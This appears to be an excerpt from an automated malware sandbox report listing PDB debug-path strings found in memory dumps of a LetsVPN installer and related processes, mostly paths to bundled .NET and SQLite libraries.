              Source: Binary string: D:\MdXaml\artifacts\obj\MdXaml\Release\net45\MdXaml.pdb source: letsvpn-latest.exe, 00000015.00000003.2366742475.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\vendor\nuget\src\Core\obj\Release\NuGet.Squirrel.pdb source: letsvpn-latest.exe, 00000015.00000003.2381179821.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Mono.Cecil.PdbG source: letsvpn-latest.exe, 00000015.00000003.2377740125.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\PowerShellStandard\src\5\obj\Release\net452\System.Management.Automation.pdbSHA2569v'` source: letsvpn-latest.exe, 00000015.00000003.2439963735.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections.NonGeneric\4.0.3.0\System.Collections.NonGeneric.pdb source: letsvpn-latest.exe, 00000015.00000003.2397242328.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\WorkShop\SuperSocket.Clientuser\obj\Release\SuperSocket.Clientuser.pdb source: letsvpn-latest.exe, 00000015.00000003.2393796689.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.nativelibrary\obj\Release\netstandard2.0\SQLitePCLRaw.nativelibrary.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2386047500.0000000003101000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003D.00000002.3443817207.00000000590B2000.00000002.00000001.01000000.0000002D.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry/net461-Windows_NT-Release/Microsoft.Win32.Registry.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2375723278.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/Microsoft.Toolkit.Uwp.Notifications/obj/Release/net461/Microsoft.Toolkit.Uwp.Notifications.pdb source: letsvpn-latest.exe, 00000015.00000003.2371393124.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: OriginalFilenameMono.Cecil.Pdb.dll6 source: letsvpn-latest.exe, 00000015.00000003.2377740125.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet.MsDelta\obj\Release\DeltaCompressionDotNet.MsDelta.pdb source: letsvpn-latest.exe, 00000015.00000003.2347762405.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/net461-Release/Microsoft.Win32.SystemEvents.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2376355832.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdb source: letsvpn-latest.exe, 00000015.00000003.2385172064.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Permissions/net461-windows-Release/System.Security.Permissions.pdb source: letsvpn-latest.exe, 00000015.00000003.2482115637.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\39\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.ComponentModel.Annotations/netfx\System.ComponentModel.Annotations.pdb source: letsvpn-latest.exe, 00000015.00000003.2399020374.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Primitives\4.0.11.0\System.Net.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2451484814.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.Watcher\4.0.2.0\System.IO.FileSystem.Watcher.pdb source: letsvpn-latest.exe, 00000015.00000003.2429279353.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.nativelibrary\obj\Release\netstandard2.0\SQLitePCLRaw.nativelibrary.pdb source: letsvpn-latest.exe, 00000015.00000003.2386047500.0000000003101000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003D.00000002.3443817207.00000000590B2000.00000002.00000001.01000000.0000002D.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Runtime.InteropServices.RuntimeInformation\net462\System.Runtime.InteropServices.RuntimeInformation.pdb source: letsvpn-latest.exe, 00000015.00000003.2464968959.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\LetsVPN\obj\Release\LetsPRO.pdb source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Reader\4.0.2.0\System.Resources.Reader.pdb source: letsvpn-latest.exe, 00000015.00000003.2459711071.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Xml/net461-windows-Release/System.Security.Cryptography.Xml.pdb source: letsvpn-latest.exe, 00000015.00000003.2481329381.000000000310C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet.PatchApi\obj\Release\DeltaCompressionDotNet.PatchApi.pdb source: letsvpn-latest.exe, 00000015.00000003.2348561937.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\obj\Release\net40\Mono.Cecil.pdb source: letsvpn-latest.exe, 00000015.00000003.2379243714.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection\4.1.2.0\System.Reflection.pdb source: letsvpn-latest.exe, 00000015.00000003.2459017919.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\x64\e_sqlite3.pdb source: letsvpn-latest.exe, 00000015.00000003.2544780901.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.NetTcp.Facade/Release/net461/System.ServiceModel.NetTcp.pdb source: letsvpn-latest.exe, 00000015.00000003.2486208547.000000000310D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\wpf_control\Microsoft.Web.WebView2.Wpf\obj\release\net45\Microsoft.Web.WebView2.Wpf.pdbon source: letsvpn-latest.exe, 00000015.00000003.2373633715.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Encoding\4.0.2.0\System.Security.Cryptography.Encoding.pdb source: letsvpn-latest.exe, 00000015.00000003.2478011371.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.batteries_v2.e_sqlite3.dynamic\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdb source: letsvpn-latest.exe, 00000015.00000003.2384419249.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Duplex.Facade/Release/net461/System.ServiceModel.Duplex.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2484710672.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Diagnostics.StackTrace/netfx\System.Diagnostics.StackTrace.pdb source: letsvpn-latest.exe, 00000015.00000003.2413846531.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Diagnostics.Tracing/netfx\System.Diagnostics.Tracing.pdb'MAM 3M_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2420810198.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Debug\4.0.11.0\System.Diagnostics.Debug.pdb source: letsvpn-latest.exe, 00000015.00000003.2409981035.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: FileDescriptionMono.Cecil.Pdb2 source: letsvpn-latest.exe, 00000015.00000003.2377740125.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.batteries_v2.e_sqlite3.dynamic\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2384419249.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\Mannelig\Dev\Projects\NET\WpfToastNotifications\Src\ToastNotifications\obj\Release\ToastNotifications.pdb source: letsvpn-latest.exe, 00000015.00000003.2511086814.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenterCrashes\Microsoft.AppCenter.Crashes.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Crashes.pdb source: letsvpn-latest.exe, 00000015.00000003.2368187744.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\Tommy\Documents\GitHub\Font-Awesome-WPF\src\WPF\FontAwesome.WPF\bin\Signed-Net40\FontAwesome.WPF.pdb source: letsvpn-latest.exe, 00000015.00000003.2350184994.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Drawing.Common/net461-Release/System.Drawing.Common.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2421605703.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Csp\4.0.2.0\System.Security.Cryptography.Csp.pdb4)N) @)_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2477452531.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\GitWorkspace\AvalonEdit\ICSharpCode.AvalonEdit\obj\Release\net45\ICSharpCode.AvalonEdit.pdb source: letsvpn-latest.exe, 00000015.00000003.2352114533.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\winforms_control\Microsoft.Web.WebView2.WinForms\obj\release\net45\Microsoft.Web.WebView2.WinForms.pdb source: letsvpn-latest.exe, 00000015.00000003.2372959947.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Microsoft.Cci.Pdb source: letsvpn-latest.exe, 00000015.00000003.2377740125.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Pipes\4.0.2.0\System.IO.Pipes.pdbh) source: letsvpn-latest.exe, 00000015.00000003.2433680162.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Text.Encoding.CodePages/net461-windows-Release/System.Text.Encoding.CodePages.pdb source: letsvpn-latest.exe, 00000015.00000003.2489791226.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Security\4.0.2.0\System.Net.Security.pdbT*n* `*_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2452861918.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\arm\e_sqlite3.pdb source: letsvpn-latest.exe, 00000015.00000003.2542712348.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.ThreadPool\4.0.12.0\System.Threading.ThreadPool.pdb source: letsvpn-latest.exe, 00000015.00000003.2497068507.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\Microsoft.Win32.Primitives\4.0.3.0\Microsoft.Win32.Primitives.pdb|( source: letsvpn-latest.exe, 00000015.00000003.2374293880.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\IEUser\pusher-websocket-dotnet\PusherClient\obj\release\net46\PusherClient.pdb source: letsvpn-latest.exe, 00000015.00000003.2381608570.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\StubExecutable.pdb source: letsvpn-latest.exe, 00000015.00000003.2346711845.000000000310D000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003A.00000000.2692956022.000000000069D000.00000002.00000001.01000000.00000018.sdmp, LetsPRO.exe, 0000003A.00000002.2702950830.000000000069D000.00000002.00000001.01000000.00000018.sdmp, LetsPRO.exe, 0000003C.00000000.2777222933.000000000069D000.00000002.00000001.01000000.00000018.sdmp, LetsPRO.exe, 0000003C.00000002.2785001894.000000000069D000.00000002.00000001.01000000.00000018.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Tools\4.0.1.0\System.Diagnostics.Tools.pdb source: letsvpn-latest.exe, 00000015.00000003.2415443172.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.Packaging/net461-Release/System.IO.Packaging.pdb source: letsvpn-latest.exe, 00000015.00000003.2432280356.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Threading.Overlapped/netfx\System.Threading.Overlapped.pdb source: letsvpn-latest.exe, 00000015.00000003.2492960900.0000000003100000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\LetsVPNDomainModel\obj\Release\LetsVPNDomainModel.pdb+CEC 7C_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2365247282.0000000003100000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000002.2707740926.0000000002B62000.00000002.00000001.01000000.0000001D.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry/net461-Windows_NT-Release/Microsoft.Win32.Registry.pdb source: letsvpn-latest.exe, 00000015.00000003.2375723278.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Runtime.Serialization.Xml/netfx\System.Runtime.Serialization.Xml.pdb source: letsvpn-latest.exe, 00000015.00000003.2469202106.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlSerializer\4.0.11.0\System.Xml.XmlSerializer.pdbt+ source: letsvpn-latest.exe, 00000015.00000003.2509600299.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Globalization\4.0.11.0\System.Globalization.pdb source: letsvpn-latest.exe, 00000015.00000003.2425036584.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NameResolution\4.0.2.0\System.Net.NameResolution.pdb|( source: letsvpn-latest.exe, 00000015.00000003.2449120272.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Timer\4.0.1.0\System.Threading.Timer.pdb source: letsvpn-latest.exe, 00000015.00000003.2501476791.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Parallel\4.0.1.0\System.Linq.Parallel.pdb source: letsvpn-latest.exe, 00000015.00000003.2437674075.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Security.Cryptography.Algorithms/netfx\System.Security.Cryptography.Algorithms.pdb source: letsvpn-latest.exe, 00000015.00000003.2476535630.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.Primitives\4.1.2.0\System.ComponentModel.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2400273396.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.provider.dynamic_cdecl\obj\Release\netstandard2.0\SQLitePCLRaw.provider.dynamic_cdecl.pdb source: letsvpn-latest.exe, 00000015.00000003.2386682491.0000000003104000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003D.00000002.3444226642.00000000590F2000.00000002.00000001.01000000.0000002F.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/net461-Release/Microsoft.Bcl.AsyncInterfaces.pdb source: letsvpn-latest.exe, 00000015.00000003.2369792600.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/net461-windows-Release/System.Security.Cryptography.ProtectedData.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2479924642.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XPath\4.0.3.0\System.Xml.XPath.pdb source: letsvpn-latest.exe, 00000015.00000003.2508023924.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sharpcompress\src\SharpCompress\obj\Release\net45\SharpCompress.pdb source: letsvpn-latest.exe, 00000015.00000003.2388904149.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\obj\Squirrel\Release\net45\Squirrel.pdb source: letsvpn-latest.exe, 00000015.00000003.2393237093.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.CompilerServices.VisualC\4.0.2.0\System.Runtime.CompilerServices.VisualC.pdb@*Z* L*_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2463035170.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Runtime.Serialization.Primitives/netfx\System.Runtime.Serialization.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2468439882.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcr120.i386.pdb source: sinaplayer_service.exe, sinaplayer_service.exe, 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Principal\4.0.1.0\System.Security.Principal.pdb source: letsvpn-latest.exe, 00000015.00000003.2483409746.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcp120.i386.pdb source: sinaplayer_service.exe, 00000013.00000002.3394803400.000000006E531000.00000020.00000001.01000000.0000000D.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Diagnostics.Tracing/netfx\System.Diagnostics.Tracing.pdb source: letsvpn-latest.exe, 00000015.00000003.2420810198.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime\4.1.2.0\System.Runtime.pdb source: letsvpn-latest.exe, 00000015.00000003.2469936140.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Runtime.InteropServices.RuntimeInformation\net462\System.Runtime.InteropServices.RuntimeInformation.pdbxE source: letsvpn-latest.exe, 00000015.00000003.2464968959.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Writer\4.0.2.0\System.Resources.Writer.pdbl( source: letsvpn-latest.exe, 00000015.00000003.2461540941.0000000003106000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection\4.1.2.0\System.Reflection.pdbH,b, T,_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2459017919.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Numerics\4.0.1.0\System.Runtime.Numerics.pdb|( source: letsvpn-latest.exe, 00000015.00000003.2466277974.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\wpfanimatedgif\WpfAnimatedGif\obj\Release\net40\WpfAnimatedGif.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2513494263.0000000003103000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.RegularExpressions\4.1.1.0\System.Text.RegularExpressions.pdb source: letsvpn-latest.exe, 00000015.00000003.2491542161.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Ping\4.0.2.0\System.Net.Ping.pdb source: letsvpn-latest.exe, 00000015.00000003.2450779209.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Duplex.Facade/Release/net461/System.ServiceModel.Duplex.pdb source: letsvpn-latest.exe, 00000015.00000003.2484710672.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Contracts\4.0.1.0\System.Diagnostics.Contracts.pdb source: letsvpn-latest.exe, 00000015.00000003.2408687064.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/net461-Release/Microsoft.Bcl.AsyncInterfaces.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2369792600.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: WebView2Loader.dll.pdb source: letsvpn-latest.exe, 00000015.00000003.2548790969.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry.AccessControl/net461-windows-Release/Microsoft.Win32.Registry.AccessControl.pdb source: letsvpn-latest.exe, 00000015.00000003.2374971901.000000000310C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\MdXaml\artifacts\obj\MdXaml\Release\net45\MdXaml.pdbSHA256/T source: letsvpn-latest.exe, 00000015.00000003.2366742475.000000000310E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: netstandard.pdb.mdb source: letsvpn-latest.exe, 00000015.00000003.2345688003.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2379243714.000000000310A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Primitives\4.0.2.0\System.Security.Cryptography.Primitives.pdb source: letsvpn-latest.exe, 00000015.00000003.2479247746.0000000003108000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/net461-Release/System.Diagnostics.EventLog.pdbSHA256~ source: letsvpn-latest.exe, 00000015.00000003.2410824087.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Security.SecureString/netfx\System.Security.SecureString.pdbf) source: letsvpn-latest.exe, 00000015.00000003.2484061202.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.InteropServices\4.1.2.0\System.Runtime.InteropServices.pdbH5b5 T5_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2465608542.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.TextWriterTraceListener\4.0.2.0\System.Diagnostics.TextWriterTraceListener.pdb source: letsvpn-latest.exe, 00000015.00000003.2414685482.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Reader\4.0.2.0\System.Resources.Reader.pdbl( source: letsvpn-latest.exe, 00000015.00000003.2459711071.0000000003104000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\pdb\obj\Release\net40\Mono.Cecil.Pdb.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2377740125.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Web.Services.Description/Release/net461/System.Web.Services.Description.pdb source: letsvpn-latest.exe, 00000015.00000003.2503983529.0000000003105000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.IsolatedStorage\4.0.2.0\System.IO.IsolatedStorage.pdb source: letsvpn-latest.exe, 00000015.00000003.2430770460.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Xml.XPath.XDocument/netfx\System.Xml.XPath.XDocument.pdb source: letsvpn-latest.exe, 00000015.00000003.2507336044.0000000003107000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Data.Odbc/net461-windows-Release/System.Data.Odbc.pdb source: letsvpn-latest.exe, 00000015.00000003.2405745648.000000000310B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Extract: Mono.Cecil.Pdb.dll... 100% source: letsvpn-latest.exe, 00000015.00000003.2479823964.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2410726668.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2482021490.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2405363721.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2552202031.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2400183214.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2532985438.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2469825366.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2534389095.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2421492280.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2385920411.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2384309605.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2423603641.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2466824384.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2485267390.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2413753120.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2404073971.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2412990203.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2524775630.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2536677390.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2459579593.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2468327085.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2398894542.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2425615678.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2448284648.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2466166258.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2424274509.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.24
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.X509Certificates\4.1.2.0\System.Security.Cryptography.X509Certificates.pdb source: letsvpn-latest.exe, 00000015.00000003.2480592822.000000000310F000.00000004.00000020.00020000.00000000.sdmp
